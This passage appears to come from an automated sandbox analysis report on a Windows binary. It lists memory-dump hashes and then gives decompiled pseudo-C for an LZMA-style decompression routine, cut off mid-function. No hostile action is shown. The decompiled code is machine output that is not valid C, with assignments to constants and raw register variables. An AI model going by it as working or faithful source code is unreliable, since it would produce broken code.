              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
              • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
              • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406FA7() {
              				unsigned short _t532;
              				signed int _t533;
              				void _t534;
              				void* _t535;
              				signed int _t536;
              				signed int _t565;
              				signed int _t568;
              				signed int _t589;
              				signed int* _t606;
              				void* _t613;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t613 - 0x40) != 0) {
              						L89:
              						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
              						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
              						L69:
              						_t606 =  *(_t613 - 0x58);
              						 *(_t613 - 0x84) = 0x12;
              						L132:
              						 *(_t613 - 0x54) = _t606;
              						L133:
              						_t532 =  *_t606;
              						_t589 = _t532 & 0x0000ffff;
              						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
              						if( *(_t613 - 0xc) >= _t565) {
              							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
              							 *(_t613 - 0x40) = 1;
              							_t533 = _t532 - (_t532 >> 5);
              							 *_t606 = _t533;
              						} else {
              							 *(_t613 - 0x10) = _t565;
              							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              							 *_t606 = (0x800 - _t589 >> 5) + _t532;
              						}
              						if( *(_t613 - 0x10) >= 0x1000000) {
              							L139:
              							_t534 =  *(_t613 - 0x84);
              							L140:
              							 *(_t613 - 0x88) = _t534;
              							goto L1;
              						} else {
              							L137:
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 5;
              								goto L170;
              							}
              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              							goto L139;
              						}
              					} else {
              						if( *(__ebp - 0x60) == 0) {
              							L171:
              							_t536 = _t535 | 0xffffffff;
              							L172:
              							return _t536;
              						}
              						__eax = 0;
              						_t258 =  *(__ebp - 0x38) - 7 >= 0;
              						0 | _t258 = _t258 + _t258 + 9;
              						 *(__ebp - 0x38) = _t258 + _t258 + 9;
              						L75:
              						if( *(__ebp - 0x64) == 0) {
              							 *(__ebp - 0x88) = 0x1b;
              							L170:
              							_t568 = 0x22;
              							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
              							_t536 = 0;
              							goto L172;
              						}
              						__eax =  *(__ebp - 0x14);
              						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              						if(__eax >=  *(__ebp - 0x74)) {
              							__eax = __eax +  *(__ebp - 0x74);
              						}
              						__edx =  *(__ebp - 8);
              						__cl =  *(__eax + __edx);
              						__eax =  *(__ebp - 0x14);
              						 *(__ebp - 0x5c) = __cl;
              						 *(__eax + __edx) = __cl;
              						__eax = __eax + 1;
              						__edx = 0;
              						_t274 = __eax %  *(__ebp - 0x74);
              						__eax = __eax /  *(__ebp - 0x74);
              						__edx = _t274;
              						__eax =  *(__ebp - 0x68);
              						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
              						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
              						_t283 = __ebp - 0x64;
              						 *_t283 =  *(__ebp - 0x64) - 1;
              						 *( *(__ebp - 0x68)) = __cl;
              						L79:
              						 *(__ebp - 0x14) = __edx;
              						L80:
              						 *(__ebp - 0x88) = 2;
              					}
              					L1:
              					_t535 =  *(_t613 - 0x88);
              					if(_t535 > 0x1c) {
              						goto L171;
              					}
              					switch( *((intOrPtr*)(_t535 * 4 +  &M004074FE))) {
              						case 0:
              							if( *(_t613 - 0x6c) == 0) {
              								goto L170;
              							}
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							_t535 =  *( *(_t613 - 0x70));
              							if(_t535 > 0xe1) {
              								goto L171;
              							}
              							_t539 = _t535 & 0x000000ff;
              							_push(0x2d);
              							asm("cdq");
              							_pop(_t570);
              							_push(9);
              							_pop(_t571);
              							_t609 = _t539 / _t570;
              							_t541 = _t539 % _t570 & 0x000000ff;
              							asm("cdq");
              							_t604 = _t541 % _t571 & 0x000000ff;
              							 *(_t613 - 0x3c) = _t604;
              							 *(_t613 - 0x1c) = (1 << _t609) - 1;
              							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
              							_t612 = (0x300 << _t604 + _t609) + 0x736;
              							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
              								L10:
              								if(_t612 == 0) {
              									L12:
              									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
              									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
              									goto L15;
              								} else {
              									goto L11;
              								}
              								do {
              									L11:
              									_t612 = _t612 - 1;
              									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
              								} while (_t612 != 0);
              								goto L12;
              							}
              							if( *(_t613 - 4) != 0) {
              								GlobalFree( *(_t613 - 4));
              							}
              							_t535 = GlobalAlloc(0x40, 0x600); // executed
              							 *(_t613 - 4) = _t535;
              							if(_t535 == 0) {
              								goto L171;
              							} else {
              								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
              								goto L10;
              							}
              						case 1:
              							L13:
              							__eflags =  *(_t613 - 0x6c);
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 1;
              								goto L170;
              							}
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
              							_t45 = _t613 - 0x48;
              							 *_t45 =  *(_t613 - 0x48) + 1;
              							__eflags =  *_t45;
              							L15:
              							if( *(_t613 - 0x48) < 4) {
              								goto L13;
              							}
              							_t547 =  *(_t613 - 0x40);
              							if(_t547 ==  *(_t613 - 0x74)) {
              								L20:
              								 *(_t613 - 0x48) = 5;
              								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
              								goto L23;
              							}
              							 *(_t613 - 0x74) = _t547;
              							if( *(_t613 - 8) != 0) {
              								GlobalFree( *(_t613 - 8));
              							}
              							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
              							 *(_t613 - 8) = _t535;
              							if(_t535 == 0) {
              								goto L171;
              							} else {
              								goto L20;
              							}
              						case 2:
              							L24:
              							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
              							 *(_t613 - 0x84) = 6;
              							 *(_t613 - 0x4c) = _t554;
              							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
              							goto L132;
              						case 3:
              							L21:
              							__eflags =  *(_t613 - 0x6c);
              							if( *(_t613 - 0x6c) == 0) {
              								 *(_t613 - 0x88) = 3;
              								goto L170;
              							}
              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
              							_t67 = _t613 - 0x70;
              							 *_t67 =  &(( *(_t613 - 0x70))[1]);
              							__eflags =  *_t67;
              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
              							L23:
              							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
              							if( *(_t613 - 0x48) != 0) {
              								goto L21;
              							}
              							goto L24;
              						case 4:
              							goto L133;
              						case 5:
              							goto L137;
              						case 6:
              							__edx = 0;
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x34) = 1;
              								 *(__ebp - 0x84) = 7;
              								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x5c) & 0x000000ff;
              							__esi =  *(__ebp - 0x60);
              							__cl = 8;
              							__cl = 8 -  *(__ebp - 0x3c);
              							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              							__ecx =  *(__ebp - 0x3c);
              							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              							__ecx =  *(__ebp - 4);
              							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              							__eflags =  *(__ebp - 0x38) - 4;
              							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              							if( *(__ebp - 0x38) >= 4) {
              								__eflags =  *(__ebp - 0x38) - 0xa;
              								if( *(__ebp - 0x38) >= 0xa) {
              									_t98 = __ebp - 0x38;
              									 *_t98 =  *(__ebp - 0x38) - 6;
              									__eflags =  *_t98;
              								} else {
              									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
              								}
              							} else {
              								 *(__ebp - 0x38) = 0;
              							}
              							__eflags =  *(__ebp - 0x34) - __edx;
              							if( *(__ebp - 0x34) == __edx) {
              								__ebx = 0;
              								__ebx = 1;
              								goto L61;
              							} else {
              								__eax =  *(__ebp - 0x14);
              								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
              								__eflags = __eax -  *(__ebp - 0x74);
              								if(__eax >=  *(__ebp - 0x74)) {
              									__eax = __eax +  *(__ebp - 0x74);
              									__eflags = __eax;
              								}
              								__ecx =  *(__ebp - 8);
              								__ebx = 0;
              								__ebx = 1;
              								__al =  *((intOrPtr*)(__eax + __ecx));
              								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
              								goto L41;
              							}
              						case 7:
              							__eflags =  *(__ebp - 0x40) - 1;
              							if( *(__ebp - 0x40) != 1) {
              								__eax =  *(__ebp - 0x24);
              								 *(__ebp - 0x80) = 0x16;
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x28);
              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
              								__eax =  *(__ebp - 0x2c);
              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              								__eax = 0;
              								__eflags =  *(__ebp - 0x38) - 7;
              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              								__al = __al & 0x000000fd;
              								__eax = (__eflags >= 0) - 1 + 0xa;
              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
              								__eax =  *(__ebp - 4);
              								__eax =  *(__ebp - 4) + 0x664;
              								__eflags = __eax;
              								 *(__ebp - 0x58) = __eax;
              								goto L69;
              							}
              							__eax =  *(__ebp - 4);
              							__ecx =  *(__ebp - 0x38);
              							 *(__ebp - 0x84) = 8;
              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
              							goto L132;
              						case 8:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xa;
              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
              							} else {
              								__eax =  *(__ebp - 0x38);
              								__ecx =  *(__ebp - 4);
              								__eax =  *(__ebp - 0x38) + 0xf;
              								 *(__ebp - 0x84) = 9;
              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
              							}
              							goto L132;
              						case 9:
              							goto L0;
              						case 0xa:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 4);
              								__ecx =  *(__ebp - 0x38);
              								 *(__ebp - 0x84) = 0xb;
              								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x28);
              							goto L88;
              						case 0xb:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__ecx =  *(__ebp - 0x24);
              								__eax =  *(__ebp - 0x20);
              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
              							} else {
              								__eax =  *(__ebp - 0x24);
              							}
              							__ecx =  *(__ebp - 0x28);
              							 *(__ebp - 0x24) =  *(__ebp - 0x28);
              							L88:
              							__ecx =  *(__ebp - 0x2c);
              							 *(__ebp - 0x2c) = __eax;
              							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
              							goto L89;
              						case 0xc:
              							L99:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xc;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t334 = __ebp - 0x70;
              							 *_t334 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t334;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							__eax =  *(__ebp - 0x2c);
              							goto L101;
              						case 0xd:
              							L37:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xd;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t122 = __ebp - 0x70;
              							 *_t122 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t122;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L39:
              							__eax =  *(__ebp - 0x40);
              							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
              							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
              								goto L48;
              							}
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								goto L54;
              							}
              							L41:
              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
              							__ecx =  *(__ebp - 0x58);
              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
              							 *(__ebp - 0x48) = __eax;
              							__eax = __eax + 1;
              							__eax = __eax << 8;
              							__eax = __eax + __ebx;
              							__esi =  *(__ebp - 0x58) + __eax * 2;
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edx = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								 *(__ebp - 0x40) = 1;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								__ebx = __ebx + __ebx + 1;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edx;
              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L39;
              							} else {
              								goto L37;
              							}
              						case 0xe:
              							L46:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xe;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t156 = __ebp - 0x70;
              							 *_t156 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t156;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							while(1) {
              								L48:
              								__eflags = __ebx - 0x100;
              								if(__ebx >= 0x100) {
              									break;
              								}
              								__eax =  *(__ebp - 0x58);
              								__edx = __ebx + __ebx;
              								__ecx =  *(__ebp - 0x10);
              								__esi = __edx + __eax;
              								__ecx =  *(__ebp - 0x10) >> 0xb;
              								__ax =  *__esi;
              								 *(__ebp - 0x54) = __esi;
              								__edi = __ax & 0x0000ffff;
              								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              								__eflags =  *(__ebp - 0xc) - __ecx;
              								if( *(__ebp - 0xc) >= __ecx) {
              									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              									__cx = __ax;
              									_t170 = __edx + 1; // 0x1
              									__ebx = _t170;
              									__cx = __ax >> 5;
              									__eflags = __eax;
              									 *__esi = __ax;
              								} else {
              									 *(__ebp - 0x10) = __ecx;
              									0x800 = 0x800 - __edi;
              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              									__ebx = __ebx + __ebx;
              									 *__esi = __cx;
              								}
              								__eflags =  *(__ebp - 0x10) - 0x1000000;
              								 *(__ebp - 0x44) = __ebx;
              								if( *(__ebp - 0x10) >= 0x1000000) {
              									continue;
              								} else {
              									goto L46;
              								}
              							}
              							L54:
              							_t173 = __ebp - 0x34;
              							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
              							__eflags =  *_t173;
              							goto L55;
              						case 0xf:
              							L58:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0xf;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t203 = __ebp - 0x70;
              							 *_t203 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t203;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L60:
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								L55:
              								__al =  *(__ebp - 0x44);
              								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
              								goto L56;
              							}
              							L61:
              							__eax =  *(__ebp - 0x58);
              							__edx = __ebx + __ebx;
              							__ecx =  *(__ebp - 0x10);
              							__esi = __edx + __eax;
              							__ecx =  *(__ebp - 0x10) >> 0xb;
              							__ax =  *__esi;
              							 *(__ebp - 0x54) = __esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								_t217 = __edx + 1; // 0x1
              								__ebx = _t217;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								 *__esi = __ax;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							 *(__ebp - 0x44) = __ebx;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L60;
              							} else {
              								goto L58;
              							}
              						case 0x10:
              							L109:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x10;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t365 = __ebp - 0x70;
              							 *_t365 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t365;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							goto L111;
              						case 0x11:
              							goto L69;
              						case 0x12:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								__eax =  *(__ebp - 0x58);
              								 *(__ebp - 0x84) = 0x13;
              								__esi =  *(__ebp - 0x58) + 2;
              								goto L132;
              							}
              							__eax =  *(__ebp - 0x4c);
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							__eflags = __eax;
              							__eax =  *(__ebp - 0x58) + __eax + 4;
              							goto L130;
              						case 0x13:
              							__eflags =  *(__ebp - 0x40);
              							if( *(__ebp - 0x40) != 0) {
              								_t469 = __ebp - 0x58;
              								 *_t469 =  *(__ebp - 0x58) + 0x204;
              								__eflags =  *_t469;
              								 *(__ebp - 0x30) = 0x10;
              								 *(__ebp - 0x40) = 8;
              								L144:
              								 *(__ebp - 0x7c) = 0x14;
              								goto L145;
              							}
              							__eax =  *(__ebp - 0x4c);
              							__ecx =  *(__ebp - 0x58);
              							__eax =  *(__ebp - 0x4c) << 4;
              							 *(__ebp - 0x30) = 8;
              							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
              							L130:
              							 *(__ebp - 0x58) = __eax;
              							 *(__ebp - 0x40) = 3;
              							goto L144;
              						case 0x14:
              							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
              							__eax =  *(__ebp - 0x80);
              							goto L140;
              						case 0x15:
              							__eax = 0;
              							__eflags =  *(__ebp - 0x38) - 7;
              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              							__al = __al & 0x000000fd;
              							__eax = (__eflags >= 0) - 1 + 0xb;
              							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
              							goto L120;
              						case 0x16:
              							__eax =  *(__ebp - 0x30);
              							__eflags = __eax - 4;
              							if(__eax >= 4) {
              								_push(3);
              								_pop(__eax);
              							}
              							__ecx =  *(__ebp - 4);
              							 *(__ebp - 0x40) = 6;
              							__eax = __eax << 7;
              							 *(__ebp - 0x7c) = 0x19;
              							 *(__ebp - 0x58) = __eax;
              							goto L145;
              						case 0x17:
              							L145:
              							__eax =  *(__ebp - 0x40);
              							 *(__ebp - 0x50) = 1;
              							 *(__ebp - 0x48) =  *(__ebp - 0x40);
              							goto L149;
              						case 0x18:
              							L146:
              							__eflags =  *(__ebp - 0x6c);
              							if( *(__ebp - 0x6c) == 0) {
              								 *(__ebp - 0x88) = 0x18;
              								goto L170;
              							}
              							__ecx =  *(__ebp - 0x70);
              							__eax =  *(__ebp - 0xc);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
              							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
              							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
              							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							_t484 = __ebp - 0x70;
              							 *_t484 =  *(__ebp - 0x70) + 1;
              							__eflags =  *_t484;
              							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
              							L148:
              							_t487 = __ebp - 0x48;
              							 *_t487 =  *(__ebp - 0x48) - 1;
              							__eflags =  *_t487;
              							L149:
              							__eflags =  *(__ebp - 0x48);
              							if( *(__ebp - 0x48) <= 0) {
              								__ecx =  *(__ebp - 0x40);
              								__ebx =  *(__ebp - 0x50);
              								0 = 1;
              								__eax = 1 << __cl;
              								__ebx =  *(__ebp - 0x50) - (1 << __cl);
              								__eax =  *(__ebp - 0x7c);
              								 *(__ebp - 0x44) = __ebx;
              								goto L140;
              							}
              							__eax =  *(__ebp - 0x50);
              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
              							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
              							__eax =  *(__ebp - 0x58);
              							__esi = __edx + __eax;
              							 *(__ebp - 0x54) = __esi;
              							__ax =  *__esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
              							__eflags =  *(__ebp - 0xc) - __ecx;
              							if( *(__ebp - 0xc) >= __ecx) {
              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
              								__cx = __ax;
              								__cx = __ax >> 5;
              								__eax = __eax - __ecx;
              								__edx = __edx + 1;
              								__eflags = __edx;
              								 *__esi = __ax;
              								 *(__ebp - 0x50) = __edx;
              							} else {
              								 *(__ebp - 0x10) = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
              								 *__esi = __cx;
              							}
              							__eflags =  *(__ebp - 0x10) - 0x1000000;
              							if( *(__ebp - 0x10) >= 0x1000000) {
              								goto L148;
              							} else {
              								goto L146;
              							}
              						case 0x19:
              							__eflags = __ebx - 4;
              							if(__ebx < 4) {
              								 *(__ebp - 0x2c) = __ebx;
              								L119:
              								_t393 = __ebp - 0x2c;
              								 *_t393 =  *(__ebp - 0x2c) + 1;
              								__eflags =  *_t393;
              								L120:
              								__eax =  *(__ebp - 0x2c);
              								__eflags = __eax;
              								if(__eax == 0) {
              									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
              									goto L170;
              								}
              								__eflags = __eax -  *(__ebp - 0x60);
              								if(__eax >  *(__ebp - 0x60)) {
              									goto L171;
              								}
